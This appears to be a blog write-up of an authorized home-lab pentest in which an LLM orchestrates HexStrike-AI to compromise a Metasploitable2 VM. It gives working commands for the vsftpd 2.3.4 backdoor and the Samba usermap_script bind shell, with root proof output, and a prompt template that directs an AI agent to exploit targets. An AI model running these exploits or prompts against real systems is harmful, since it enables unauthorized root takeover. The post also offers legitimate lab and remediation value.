HexStrike + OpenAI Codex: AI-Driven Exploitation of Metasploitable

Article Metadata

Category: CTI
Source article: https://medium.com/@1200km/hexstrike-openai-codex-ai-driven-exploitation-of-metasploitable-b892c07be39f
Published: 2026-01-03
Preserved media: 8 image(s), including cover images, screenshots, diagrams, and infographics where present.
Preserved technical blocks: 8 code/configuration block(s).

Ecosystem Fit

This page mirrors the original Medium article into the 1200km.com Docusaurus ecosystem. The original article flow, images, screenshots, infographics, and technical blocks are preserved from the export.

How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)

Introduction

AI-assisted penetration testing is no longer a concept — it is operational reality.

In this article, I walk through a real, authorized penetration test against my own lab host running Metasploitable2. I used an LLM-driven workflow (Codex CLI) orchestrating tool execution through HexStrike-AI to perform:

network discovery
enumeration and service fingerprinting
exploit selection and execution
proof collection (root-level command output)

This was not a simulation.

Real tools were executed. Real vulnerabilities were validated. And the target was compromised with unauthenticated root access twice, via two independent attack paths.

Core Guides and Setup

HexStrike on Kali Linux 2025.4: A Comprehensive Guide

Focus: Initial setup and overview of the AI-powered offensive security framework.

HexStrike-AI: A Force Multiplier for Red Teams — and a Dangerous Shift in the Threat Landscape

Focus: Analysis of AI-orchestrated pentesting and its implications.

HexStrike MCP Orchestration with Ollama: Ubuntu Host, Kali VM, SSH Bridging, and Performance…

Focus: Technical architecture using Model Context Protocol (MCP) and local LLMs.

Practical Applications & Lab Comparisons

HexStrike + Gemini vs. HackerAI: “Ops Copilot” vs. “Chatbot with Tools”

Focus: Practical lab comparison of orchestration quality between different AI security tools.

AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation

Focus: Step-by-step home lab application for network enumeration.

Specific Tooling & Technique Guides

What Is HexStrike-AI?

HexStrike-AI is not “another scanner.”

It is an orchestration layer that lets an LLM:

decide what security tools to run
execute them locally (or via SSH/MCP)
interpret outputs
adapt strategy dynamically (timeouts, missing tools, privilege constraints)
optionally run controlled exploitation with PoC evidence

In short:

The AI plans. HexStrike executes. Kali delivers the tools.

Test Scope & Authorization

This assessment was conducted under explicit authorization.

Scope

**Target:** 172.16.163.129
**Environment:** private home lab (Metasploitable2 VM)
**Attacker:** Kali Linux environment with Codex CLI + HexStrike MCP
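
A scope like this can be enforced in code before any tool runs. The following is a minimal sketch, not part of HexStrike itself: the `AUTHORIZED_SCOPE` list and the `in_scope` helper are hypothetical names introduced here for illustration, and the scope is assumed to be the single lab host listed above.

```python
import ipaddress

# Assumption: the authorized scope is exactly one lab host (a /32 network).
AUTHORIZED_SCOPE = [ipaddress.ip_network("172.16.163.129/32")]


def in_scope(target: str) -> bool:
    """Return True only if target parses as an IP inside the authorized scope."""
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        # Hostnames, typos, and other non-IP strings are rejected outright.
        return False
    return any(addr in net for net in AUTHORIZED_SCOPE)


print(in_scope("172.16.163.129"))  # True
print(in_scope("172.16.59.129"))   # False
```

A check of this kind would reject a mistyped address before a scan is launched, rather than after the scan reports the host as down.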

The Prompt That Started Everything

This is the “pattern” that makes LLM-driven pentesting actually work: you must demand execution + evidence.

Example prompt structure (adapt it to your CLI):

Use the MCP server "hexstrike": Authorized pentest of 172.16.163.129
Full service discovery
Enumerate versions
Identify vulnerabilities (by severity)
Exploit critical findings
Provide proofs (command output)

Key lesson: If you want HexStrike to run tools, explicitly require tool execution and proof artifacts.

Phase 1: Reachability and Discovery

The first attempt targeted the wrong IP (172.16.59.129) and resulted in “host seems down.”

After correcting the target to 172.16.163.129, the host responded immediately.

A fast top-ports discovery scan confirmed the target was up and exposed a broad attack surface.

Phase 2: Enumeration & Service Fingerprinting

Because the environment had constraints (root privileges not always available, tool timeouts), the workflow adapted:

switched from SYN scan (-sS) to TCP connect (-sT)
used bounded host timeouts
reduced version intensity when needed
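
The adaptations above can be sketched as a small argument builder. This is an illustration only, not the command line HexStrike actually generated: `build_nmap_args` is a hypothetical helper, and the default timeout and intensity values are assumptions. The nmap options themselves (`-sS`, `-sT`, `-sV`, `--host-timeout`, `--version-intensity`) are standard.

```python
def build_nmap_args(target, is_root, host_timeout="90s", version_intensity=None):
    """Build an nmap argument list that adapts to privilege and time limits."""
    # SYN scans need raw-socket privileges; fall back to TCP connect otherwise.
    scan_type = "-sS" if is_root else "-sT"
    args = ["nmap", scan_type, "-sV", "--host-timeout", host_timeout]
    if version_intensity is not None:
        # nmap accepts version intensities from 0 (light) to 9 (all probes).
        if not 0 <= version_intensity <= 9:
            raise ValueError("version_intensity must be between 0 and 9")
        args += ["--version-intensity", str(version_intensity)]
    args.append(target)
    return args


print(" ".join(build_nmap_args("172.16.163.129", is_root=False, version_intensity=2)))
```

On a Unix attacker host, `is_root` could be derived from `os.geteuid() == 0`; returning a list rather than a string keeps the arguments safe to pass to `subprocess.run` without shell quoting.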

Confirmed exposed services (high-level)

The target exposed multiple legacy services typical of Metasploitable2:

FTP (21)
SSH (22)
Telnet (23)
SMTP (25)
DNS (53)
HTTP (80)
RPCbind (111)
SMB (139/445)
rlogin/rsh (513/514)
NFS (2049)
FTP alt (2121)
MySQL (3306)
PostgreSQL (5432)
VNC (5900)
X11 (6000)
AJP (8009)

Host identity confirmation

The HTTP landing page provided a definitive marker:

curl -s http://172.16.163.129:80 | head -n 5

Output included:

<title>Metasploitable2 - Linux</title>

At this point, the test shifted from “general assessment” to “known vulnerable image validation” — meaning we should expect multiple published RCE paths.
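
The identity check can be scripted rather than eyeballed. A minimal sketch, assuming the page body has already been fetched into a string; `extract_title` is a hypothetical helper, and a regular expression is used here only because the marker is a single simple tag.

```python
import re


def extract_title(html):
    """Return the text of the first <title> element, or None if absent."""
    match = re.search(r"<title[^>]*>(.*?)</title>", html, re.IGNORECASE | re.DOTALL)
    return match.group(1).strip() if match else None


# Sample input built around the title line observed in the curl output.
sample = "<html><head><title>Metasploitable2 - Linux</title></head>"
print(extract_title(sample))  # Metasploitable2 - Linux
```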

Phase 3: Vulnerability Discovery (What Stood Out Immediately)

Two services were immediate critical flags due to known RCE history in this lab image:

vsftpd 2.3.4 (commonly backdoored in lab builds)
Samba 3.0.20 (classic usermap_script RCE path)

Rather than listing every CVE possible for every old service, the workflow focused on:

vulnerabilities with direct, reliable exploitability
minimal risk of destabilizing the host
clear PoC output validation
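
This prioritization can be sketched as a lookup of fingerprinted versions against a short list of known-critical builds. The `KNOWN_CRITICAL` table and `triage` function are hypothetical names for illustration; the two entries are the services and CVEs covered in this article, and the input tuples are an assumed shape, not raw nmap output.

```python
# Known-critical (product, version) pairs mapped to their CVE identifiers.
KNOWN_CRITICAL = {
    ("vsftpd", "2.3.4"): "CVE-2011-2523",
    ("samba", "3.0.20"): "CVE-2007-2447",
}


def triage(fingerprints):
    """Return only the fingerprints that match a known-critical build."""
    hits = []
    for port, product, version in fingerprints:
        cve = KNOWN_CRITICAL.get((product.lower(), version))
        if cve is not None:
            hits.append((port, product, version, cve))
    return hits


# Illustrative input; the SSH entry is a placeholder with no version claim.
observed = [(21, "vsftpd", "2.3.4"), (22, "OpenSSH", "unknown"), (139, "Samba", "3.0.20")]
for hit in triage(observed):
    print(hit)
```

Exact-match lookup is deliberately conservative: it only flags builds with a direct, well-documented exploit path and ignores everything else.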

Phase 4: Exploitation (With Proofs)

Exploit #1: vsftpd 2.3.4 backdoor (CVE-2011-2523) → Root

Why it worked

In the Metasploitable2 build, vsftpd is intentionally vulnerable. A crafted username containing :) triggers a backdoor listener (commonly on TCP/6200).

Step A — Trigger the backdoor

(printf "USER test:)\r\nPASS test\r\nQUIT\r\n"; sleep 1) | nc -nv -w 2 172.16.163.129 21

This confirmed:

FTP reachable
banner: 220 (vsFTPd 2.3.4)

Step B — Connect to backdoor shell and capture proof

printf "id\nuname -a\nwhoami\npwd\n" | nc -nv -w 3 172.16.163.129 6200

Proof (captured output):

uid=0(root) gid=0(root)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root
/

**Impact:** Unauthenticated Remote Code Execution → root.

No persistence was deployed. No further actions were taken.
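
Proof output like the capture above can be validated programmatically instead of by eye. A minimal sketch, assuming the proof is available as a text blob whose first parsable line is the output of `id`; `parse_id_output` and `is_root_proof` are hypothetical helpers.

```python
import re


def parse_id_output(line):
    """Parse the leading uid/gid fields of `id` output into a dict, or None."""
    match = re.match(r"uid=(\d+)\(([^)]*)\)\s+gid=(\d+)\(([^)]*)\)", line.strip())
    if match is None:
        return None
    uid, user, gid, group = match.groups()
    return {"uid": int(uid), "user": user, "gid": int(gid), "group": group}


def is_root_proof(output):
    """Return True if the first parsable `id` line in output reports uid 0."""
    for line in output.splitlines():
        parsed = parse_id_output(line)
        if parsed is not None:
            return parsed["uid"] == 0
    return False


proof = "uid=0(root) gid=0(root)\nroot\n/\n"
print(is_root_proof(proof))  # True
```

Checking the numeric uid rather than the string "root" avoids false positives from usernames or paths that merely contain that word.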

Exploit #2: Samba usermap_script (CVE-2007-2447) → Root bind shell

Why it worked

Samba 3.0.20 has a well-known remote command execution vulnerability via the username map script feature. Metasploit automates exploitation.

Tooling nuance: why a bind shell was used

The first Metasploit run produced unstable command shell behavior (sessions closing quickly and command execution differences between session types). The workflow pivoted to a bind shell payload, which is often more reliable in constrained environments.

Step A — Launch exploit with bind netcat payload (binds on port 4446)

msfconsole -q -x 'use exploit/multi/samba/usermap_script; \
set RHOSTS 172.16.163.129; set RPORT 139; \
set payload cmd/unix/bind_netcat; \
set LPORT 4446; set DisablePayloadHandler true; \
exploit -z; exit -y'

Step B — Connect to bind shell and capture proof

printf "id\nuname -a\nwhoami\npwd\n" | nc -nv -w 3 172.16.163.129 4446

Proof (captured output):

uid=0(root) gid=0(root)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root
/

**Impact:** Unauthenticated Remote Code Execution → root.

Final Results Summary

What was validated

Broad service exposure consistent with Metasploitable2
Two separate unauthenticated root compromises, each independently sufficient for full takeover:
vsftpd backdoor (TCP/6200)
Samba usermap_script (bind shell on TCP/4446)

What was intentionally not done

No persistence / backdoors
No credential harvesting
No data collection beyond proof commands
No lateral movement testing

This kept the test strictly PoC-focused.

Remediation Recommendations (Real-World Perspective)

Metasploitable2 is intentionally insecure. In real systems, the remediation playbook is clear.

Critical

Remove backdoored/vulnerable services immediately
Never expose training VMs on networks shared with real assets
Enforce segmentation (lab VLAN / host-only networks)

High

Remove legacy cleartext and trust-based services:
Telnet
rsh/rlogin
VNC / X11 (unless strictly controlled)
Restrict SMB exposure and enforce modern versions/configs

Medium

Disable obsolete crypto (SSLv2) and weak ciphers
Remove version banners and harden HTTP stack
Restrict AJP to localhost/internal networks only

Low

Reduce attack surface: firewall by default, allowlist by source
Continuous inventory and exposure monitoring
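
Exposure monitoring of this kind reduces to comparing what a scan observes against what policy allows. A minimal sketch: `unexpected_ports` is a hypothetical helper, the observed list is the set of ports found on the lab host in this test, and the allowlist is an invented example policy, not a recommendation.

```python
def unexpected_ports(observed, allowlist):
    """Return the observed ports that the allowlist does not permit, sorted."""
    return sorted(set(observed) - set(allowlist))


# Ports confirmed open on the lab host during enumeration.
observed = [21, 22, 23, 25, 53, 80, 111, 139, 445, 513, 514,
            2049, 2121, 3306, 5432, 5900, 6000, 8009]

# Hypothetical policy: only SSH and HTTP may be exposed.
allowlist = {22, 80}

violations = unexpected_ports(observed, allowlist)
print(len(violations))  # 16
```

Run on a schedule against fresh scan results, a diff like this turns the inventory recommendation into an alert whenever a new service appears.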

Why This Matters

This test highlights the real value of AI in offensive workflows:

AI did not “replace” pentesting skills. It amplified them.

The LLM-driven workflow:

selected practical next steps
adapted to missing tools and privilege constraints
pivoted when sessions were unstable
still produced clean PoC artifacts

The operator still matters, but the mental overhead drops sharply.

Final Thoughts

HexStrike-AI is not a toy. Used correctly, it behaves like a junior pentester with perfect memory and infinite patience — executing exactly what you instruct and iterating until it gets results.
